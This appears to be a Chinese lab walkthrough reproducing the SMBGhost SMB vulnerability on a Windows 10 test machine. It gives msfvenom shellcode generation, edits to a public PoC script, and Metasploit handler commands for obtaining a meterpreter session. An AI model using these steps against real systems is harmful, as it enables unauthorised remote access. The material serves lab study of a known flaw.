游龙战神|Windows10永恒之黑复现( 二 )
Kali Linux实操进行反弹shell
root用户登录(默认不能登录,需要给root设置密码后才能登录):
普通用户登录后 , sudo passwd root 给root设置密码 , 成功后重启kali , 便能使用root登录!
1. 下载PoC , SMBGhost_RCE_PoC-master.zip
解压后 , 进入目录:
2. 用msfvenom生成python类型(-f python)的shellcode
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python
把生成的buf += b“......”中的值copy下来 , 打开exploit.py文件 , 替换USER_PAYLOAD的值:
替换为:
替换技巧:
生成的数据连同buf+=都copy下来 , 然后粘贴USER_PAYLOAD= ...... , 最后使用查找和替换把buf替换为USER_PAYLOAD!
强调: 修改一定要仔细和精确 , 然后保存退出 , 不然你会怀疑人生!
3. 启动msf控制端设置有效载荷并开启4444端口监听
msfconsole
(1) use exploit/multi/handler
(2) set payload windows/x64/meterpreter/bind_tcp
(3) set lport 4444
(4) set rhost 192.168.152.167 (Win10的IP地址)
(5) run
4. python3执行exploit.py脚本
新终端打开执行:
python3 exploit.py -ip 192.168.152.167
出现图中提示 , 按任意键执行shellcode!
查看msfconsole终端:
提示有session 1 opened
注意:如果没有session 1 opened提示 , 可以退出监听(ctrl+c)重新run一下再次监听 , 直到成功为止!
推荐阅读
- 龙之队|Windows10上触控板失灵的3种解决方案
- 游龙战神|2020年中国搜索引擎行业市场现状及发展前景分析
- 游龙战神|将轻松跑800-1000km?特斯拉表示:我就没怕过谁
- 手游葱花酱|《王者荣耀》:战神解除封印,重塑宫本一刀万血?
- 战神游戏office|新游往往最暴利,《新神魔大陆》攻略
- 洪都烟客|中国历史上的战将奇迹!,春秋战国之战神白起:乱世最杰出之将领
- 铲史人|清朝第一代“战神”,连“年羹尧”都惧他三分,他是三朝武将
- 游龙战神|不过时的“真机皇”——华为mate20Pro
- 游龙战神|中国成为世界芯片最大进口国,这是好事吗?专家:不一定是好事
- 超级游戏助手|“吃鸡”第三面板到底好在哪?不求人也苦练第三面板,已成战神标配
